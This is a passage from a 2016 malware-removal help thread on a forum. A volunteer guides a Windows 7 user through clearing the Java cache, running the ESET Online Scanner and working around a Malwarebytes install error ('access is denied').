Make sure you untick the box next to whatever free program they prompt you to install, unless you want it.
  • After the install is complete, go back to your Control Panel and click the Java icon. (looks like a coffee cup)
    • On the General tab, under Temporary Internet Files, click the Settings button.
    • Next, click on the Delete Files button.
    • There are two options checked in the window to clear the cache - Leave BOTH Checked
      • Cached Applications and Applets
      • Trace and Log Files
    • Click OK on Delete Temporary Files Window.
      Note: This deletes ALL the Downloaded Cached Applications and Applets from the CACHE
    • Click OK to leave the Temporary Files Window.
    • Click OK to leave the Java Control Panel.
------------------------------------------------------

Please run this online scan to help look for remnants. Ensure your external and/or USB drives are inserted during the scan.

Go here and click 'SCAN NOW' under 'ESET Online Scanner' to check for remnants.
  • You will be prompted to download and install esetonlinescanner_enu.exe. Click on the link and save the file to a convenient location.
  • Double-click on esetonlinescanner_enu.exe to install and a new window will open. Follow the prompts.
  • Turn off the real-time scanner of any existing antivirus program before performing the online scan. Here's how
  • At the bottom of the Terms of use window, tick the option Download latest version of ESET Online Scanner then click Accept
  • When/if prompted by UAC, 'Do you want to allow this app to make changes to your PC?', please choose Yes
  • Tick the option Enable detection of potentially unwanted applications
  • Click on Advanced settings
  • Make sure that the option Clean threats automatically is unticked.
  • Ensure these options are ticked:
    • Enable detection of potentially unsafe applications
    • Enable detection of suspicious applications
    • Scan archives
    • Enable Anti-Stealth technology
  • Click Scan
  • Wait for the scan to finish.
  • When the scan is done, if it shows a screen that says Threats found, click Save to text file... then name it and save it to your desktop.
  • Do NOT be alarmed by what you see in the report. Many of the finds have likely been quarantined.
  • Please copy/paste the contents of the log in your next reply.
  • To close ESET Online Scanner, select Do not clean then Finish
------------------------------------------------------

Please post the following in your next reply:

MBAM log
ESET report
report on system behavior
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 10-20-2016, 01:37 AM   #16
Registered Member
 
Join Date: Oct 2016
Posts: 31
OS: windows 7 service pack 1



chemist, I am sorry to report that MBAM is not able to install, as it gives me an error:
Setup was unable to create the directory "C:/ProgramData/Malwarebytes/Malwarebytes-Anti-Malware" error 5 access is denied.
The error appears even when I give it administrator rights (even when I change the install directory). I did as you said for Java and it became updated. Next, the ESET program seems to change its screen to be completely grey if it goes beyond 100000 files.
The current status says the firewall is now no longer resetting back to on, but when it is on it now doesn't seem to ask for permission for any of my currently installed programs, but that is expected. I am unable to see if the firewall is broken or changed in some way.
nikolap is offline  
Old 10-20-2016, 02:43 AM   #17
P.S. I did submit the file.
nikolap is offline  
Old 10-20-2016, 03:42 PM   #18
Hello again, nikolap. Thanks for submitting the file.

Was MBAM previously installed on your machine?

Download mbam-clean-2.3.0.1001.exe and Save it to your Desktop.
  • Double-click mbam-clean-2.3.0.1001.exe and follow the prompts to run it.
  • When prompted, please reboot your computer.
  • Delete mbam-clean-2.3.0.1001.exe from your desktop.
-------------------------------------------------------

Now try installing MBAM. Let me know.

-------------------------------------------------------
chemist is offline  
Old 10-20-2016, 11:51 PM   #19
This error appears:
Imgur: The most awesome images on the Internet
And yes, MBAM was installed a few years ago, but I'm pretty sure I uninstalled it.
nikolap is offline  
Old 10-21-2016, 12:55 PM   #20
Sorry you are having trouble. Please run FRST again and post/attach the logs as before. Thanks.
chemist is offline  
All times are GMT -7.